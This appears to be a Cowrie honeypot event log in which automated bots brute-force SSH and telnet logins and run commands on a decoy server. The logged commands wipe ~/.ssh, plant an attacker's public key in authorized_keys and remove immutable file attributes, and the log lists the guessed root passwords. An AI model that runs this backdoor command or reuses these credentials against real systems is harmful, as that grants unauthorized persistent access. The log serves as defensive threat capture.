{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:18.347456Z","src_ip":"212.227.235.229","session":"7f84772aa12c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:59:19.252294Z","src_ip":"212.227.235.229","session":"7f84772aa12c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:59:19.253039Z","src_ip":"212.227.235.229","session":"7f84772aa12c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:59:19.473914Z","src_ip":"212.227.235.229","session":"7f84772aa12c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:19.474800Z","src_ip":"212.227.235.229","session":"7f84772aa12c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43324,"dst_ip":"1.2.3.4","dst_port":22,"session":"84c81eaec604","protocol":"ssh","message":"New connection: 212.227.235.229:43324 (1.2.3.4:22) [session: 84c81eaec604]","sensor":"my-vps","timestamp":"2025-08-28T15:59:19.689596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:59:19.690776Z","src_ip":"212.227.235.229","session":"84c81eaec604"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:59:19.907507Z","src_ip":"212.227.235.229","session":"84c81eaec604"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:59:20.817981Z","src_ip":"212.227.235.229","session":"84c81eaec604"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36492,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cd7998f3ad9","protocol":"ssh","message":"New connection: 212.227.235.229:36492 (1.2.3.4:22) [session: 1cd7998f3ad9]","sensor":"my-vps","timestamp":"2025-08-28T15:59:21.325218Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:59:21.326190Z","src_ip":"212.227.235.229","session":"1cd7998f3ad9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:59:21.543597Z","src_ip":"212.227.235.229","session":"1cd7998f3ad9"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:22.036479Z","src_ip":"212.227.235.229","session":"84c81eaec604"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44346,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a47025bc7b7","protocol":"ssh","message":"New connection: 212.227.235.229:44346 (1.2.3.4:22) [session: 4a47025bc7b7]","sensor":"my-vps","timestamp":"2025-08-28T15:59:22.266444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:59:22.268121Z","src_ip":"212.227.235.229","session":"4a47025bc7b7"}
{"eventid":"cowrie.login.success","username":"root","password":"zp123456","message":"login attempt [root/zp123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:59:22.456687Z","src_ip":"212.227.235.229","session":"1cd7998f3ad9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:59:22.498831Z","src_ip":"212.227.235.229","session":"4a47025bc7b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:59:22.912096Z","src_ip":"212.227.235.229","session":"1cd7998f3ad9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:59:22.912870Z","src_ip":"212.227.235.229","session":"1cd7998f3ad9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:59:22.913808Z","src_ip":"212.227.235.229","session":"1cd7998f3ad9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:23.133301Z","src_ip":"212.227.235.229","session":"1cd7998f3ad9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:59:23.456964Z","src_ip":"212.227.235.229","session":"4a47025bc7b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:59:23.628954Z","src_ip":"212.227.235.229","session":"1cd7998f3ad9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:59:23.629653Z","src_ip":"212.227.235.229","session":"1cd7998f3ad9"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:23.687932Z","src_ip":"212.227.235.229","session":"7f84772aa12c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:23.688906Z","src_ip":"212.227.235.229","session":"4a47025bc7b7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:59:23.849187Z","src_ip":"212.227.235.229","session":"1cd7998f3ad9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:23.850055Z","src_ip":"212.227.235.229","session":"1cd7998f3ad9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36506,"dst_ip":"1.2.3.4","dst_port":22,"session":"f860d874e8ac","protocol":"ssh","message":"New connection: 212.227.235.229:36506 (1.2.3.4:22) [session: f860d874e8ac]","sensor":"my-vps","timestamp":"2025-08-28T15:59:24.046065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:59:24.046780Z","src_ip":"212.227.235.229","session":"f860d874e8ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:59:24.253894Z","src_ip":"212.227.235.229","session":"f860d874e8ac"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:59:25.135124Z","src_ip":"212.227.235.229","session":"f860d874e8ac"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:26.345037Z","src_ip":"212.227.235.229","session":"f860d874e8ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39236,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f4aa5398402","protocol":"ssh","message":"New connection: 212.227.235.229:39236 (1.2.3.4:22) [session: 2f4aa5398402]","sensor":"my-vps","timestamp":"2025-08-28T15:59:26.551703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:59:26.552752Z","src_ip":"212.227.235.229","session":"2f4aa5398402"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:59:26.759041Z","src_ip":"212.227.235.229","session":"2f4aa5398402"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:59:27.628139Z","src_ip":"212.227.235.229","session":"2f4aa5398402"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:27.837280Z","src_ip":"212.227.235.229","session":"2f4aa5398402"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:27.847332Z","src_ip":"212.227.235.229","session":"1cd7998f3ad9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38462,"dst_ip":"1.2.3.4","dst_port":23,"session":"58b8c676df9e","protocol":"telnet","message":"New connection: 212.227.235.229:38462 (1.2.3.4:23) [session: 58b8c676df9e]","sensor":"my-vps","timestamp":"2025-08-28T15:59:52.321219Z"}
{"eventid":"cowrie.session.closed","duration":1.649876594543457,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:53.971041Z","src_ip":"212.227.235.229","session":"58b8c676df9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38470,"dst_ip":"1.2.3.4","dst_port":23,"session":"c68f7fd8887d","protocol":"telnet","message":"New connection: 212.227.235.229:38470 (1.2.3.4:23) [session: c68f7fd8887d]","sensor":"my-vps","timestamp":"2025-08-28T15:59:54.068028Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:59:54.350390Z","src_ip":"212.227.235.229","session":"c68f7fd8887d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:59:54.373105Z","src_ip":"212.227.235.229","session":"c68f7fd8887d"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T15:59:54.493062Z","src_ip":"212.227.235.229","session":"c68f7fd8887d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:55.567181Z","src_ip":"212.227.235.229","session":"c68f7fd8887d"}
{"eventid":"cowrie.session.closed","duration":1.5043184757232666,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:59:55.572275Z","src_ip":"212.227.235.229","session":"c68f7fd8887d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63884,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee8111f98566","protocol":"ssh","message":"New connection: 217.72.205.35:63884 (1.2.3.4:22) [session: ee8111f98566]","sensor":"my-vps","timestamp":"2025-08-28T16:00:05.317082Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:00:05.318295Z","src_ip":"217.72.205.35","session":"ee8111f98566"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:00:26.217099Z","src_ip":"212.227.125.160","session":"a1bdfa745cd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39020,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fa2ff3ec683","protocol":"ssh","message":"New connection: 212.227.235.229:39020 (1.2.3.4:22) [session: 0fa2ff3ec683]","sensor":"my-vps","timestamp":"2025-08-28T16:00:26.415377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:00:26.416600Z","src_ip":"212.227.235.229","session":"0fa2ff3ec683"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:00:26.658271Z","src_ip":"212.227.235.229","session":"0fa2ff3ec683"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu1234","message":"login attempt [root/ubuntu1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:00:27.664361Z","src_ip":"212.227.235.229","session":"0fa2ff3ec683"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:00:28.168514Z","src_ip":"212.227.235.229","session":"0fa2ff3ec683"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:00:28.169254Z","src_ip":"212.227.235.229","session":"0fa2ff3ec683"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:00:28.170339Z","src_ip":"212.227.235.229","session":"0fa2ff3ec683"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:00:28.413057Z","src_ip":"212.227.235.229","session":"0fa2ff3ec683"}
